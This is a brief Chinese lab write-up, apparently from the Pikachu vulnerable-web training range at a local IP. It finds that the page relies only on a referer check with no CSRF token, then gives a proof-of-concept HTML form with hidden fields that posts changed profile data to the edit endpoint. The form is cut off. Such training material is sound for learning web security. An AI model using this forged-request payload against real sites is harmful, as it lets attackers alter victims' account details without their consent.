一、分析代码
发现验证refer,没有token验证,没有防止csrf的措施,可以进行CSRF攻击。
二、构建一个错误信息脚本
csrf_poc.php
放入http://192.168.56.129/pikachu-master/vul/csrf 中
<html>
<body>
<form name="px" method="post" action="http://192.168.56.129/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
<input type="hidden" name="sex" value="girl">
<input type="hidden" name="phonenum" value="12345678922">
<input type="hidden" name="add" value="nab77">
<input type="hidden" name="email" value="lucy@pikachu.com">
<input type="submit" name="submit" value="submit">